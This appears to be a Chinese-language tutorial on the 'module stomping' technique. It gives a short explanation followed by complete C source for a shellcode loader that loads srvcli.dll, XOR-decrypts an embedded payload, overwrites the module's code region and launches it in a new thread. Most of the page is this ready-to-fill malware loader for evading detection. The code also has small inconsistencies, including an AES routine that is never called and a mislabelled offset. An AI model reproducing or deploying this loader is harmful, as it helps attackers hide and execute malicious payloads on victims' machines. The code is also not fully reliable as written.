模块踩踏
简介
模块践踏通常涉及到选择一个已经加载到内存中的模块,然后覆盖或替换这个模块的部分内容,通常是其.text段(代码段),以实现恶意代码的注入
实现思路
在内存中加载
srvcli.dll模块,并找到这个模块在内存中的地址。定义了一个包含加密后shellcode的数组(
encryptedShellcode)和一个密钥(key)。此shellcode是以异或加密的形式给出的。创建一个新的数组(shellcode),用于存储解密后的shellcode。使用给定的密钥对加密的shellcode进行解密。
调用
NtProtectVirtualMemory函数改变选定内存区域的保护属性,将其改为可读写。使用
RtlMoveMemory函数将解密后的shellcode复制到目标模块(srvcli.dll)在内存中的地址。使用
NtProtectVirtualMemory函数恢复原来的内存保护属性。创建一个新线程来执行注入的shellcode。新线程的入口点设置为shellcode的内存地址。
调用
NtWaitForSingleObject等待新创建的线程执行完毕。
完整代码
#include <Windows.h>
#include <stdio.h>
#include <wincrypt.h>
#pragma comment (lib, "crypt32.lib")
#pragma comment(lib, "ntdll")
#define NtCurrentProcess() ((HANDLE)-1)
#define DEFAULT_BUFLEN 4096
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif
WCHAR* slib = (WCHAR*)L"C:\\Windows\\system32\\srvcli.dll";
EXTERN_C NTSTATUS NtAllocateVirtualMemory(
HANDLE ProcessHandle,
PVOID* BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect
);
EXTERN_C NTSTATUS NtProtectVirtualMemory(
IN HANDLE ProcessHandle,
IN OUT PVOID* BaseAddress,
IN OUT PSIZE_T RegionSize,
IN ULONG NewProtect,
OUT PULONG OldProtect);
EXTERN_C NTSTATUS NtCreateThreadEx(
OUT PHANDLE hThread,
IN ACCESS_MASK DesiredAccess,
IN PVOID ObjectAttributes,
IN HANDLE ProcessHandle,
IN PVOID lpStartAddress,
IN PVOID lpParameter,
IN ULONG Flags,
IN SIZE_T StackZeroBits,
IN SIZE_T SizeOfStackCommit,
IN SIZE_T SizeOfStackReserve,
OUT PVOID lpBytesBuffer
);
EXTERN_C NTSTATUS NtWaitForSingleObject(
IN HANDLE Handle,
IN BOOLEAN Alertable,
IN PLARGE_INTEGER Timeout
);
void DecryptAES(char* shellcode, DWORD shellcodeLen, char* key, DWORD keyLen) {
HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;
if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES,
CRYPT_VERIFYCONTEXT)) {
printf("Failed in CryptAcquireContextW (%u)\n", GetLastError());
return;
}
if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
printf("Failed in CryptCreateHash (%u)\n", GetLastError());
return;
}
if (!CryptHashData(hHash, (BYTE*)key, keyLen, 0)) {
printf("Failed in CryptHashData (%u)\n", GetLastError());
return;
}
if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
printf("Failed in CryptDeriveKey (%u)\n", GetLastError());
return;
}
if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)shellcode,
&shellcodeLen)) {
printf("Failed in CryptDecrypt (%u)\n", GetLastError());
return;
}
CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);
}
int main(int argc, char** argv) {
// 填写xor加密后的shellcode
char encryptedShellcode[] = "";
// 定义解密所用的密钥
char key[] = "12henry1222345??6aa+-==@asd";
DWORD payload_length = sizeof(encryptedShellcode);
PVOID BaseAddress = NULL;
SIZE_T dwSize = 0x2000;
HMODULE addr;
addr = LoadLibrary(slib);
BaseAddress = addr + 0x1000 * 2 + 0xf; //2kb+f
printf(" ptr:%p", BaseAddress);
// 定义一个与加密shellcode大小相同的数组用于存储解密后的shellcode
unsigned char shellcode[sizeof encryptedShellcode];
// 获取密钥的长度
int keylength = strlen(key);
// 遍历加密的shellcode,并使用异或操作进行解密,将结果存储在shellcode数组中
for (int i = 0; i < sizeof encryptedShellcode; i++) {
shellcode[i] = encryptedShellcode[i] ^ key[i % keylength];
printf("%02X", shellcode[i]);
}
DWORD OldProtect = 0;
NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize,
PAGE_READWRITE, &OldProtect);
RtlMoveMemory(BaseAddress, shellcode, sizeof(shellcode));
HANDLE hThread;
NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize,
OldProtect, &OldProtect);
HANDLE hHostThread = INVALID_HANDLE_VALUE;
NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF,
NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE,
NULL, NULL, NULL, NULL);
getchar();
if (!NT_SUCCESS(NtCreateThreadstatus)) {
printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError());
return 3;
}
LARGE_INTEGER Timeout;
Timeout.QuadPart = -10000000;
NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, NULL);
if (!NT_SUCCESS(NTWFSOstatus)) {
printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError());
return 4;
}
return 0;
}最后更新于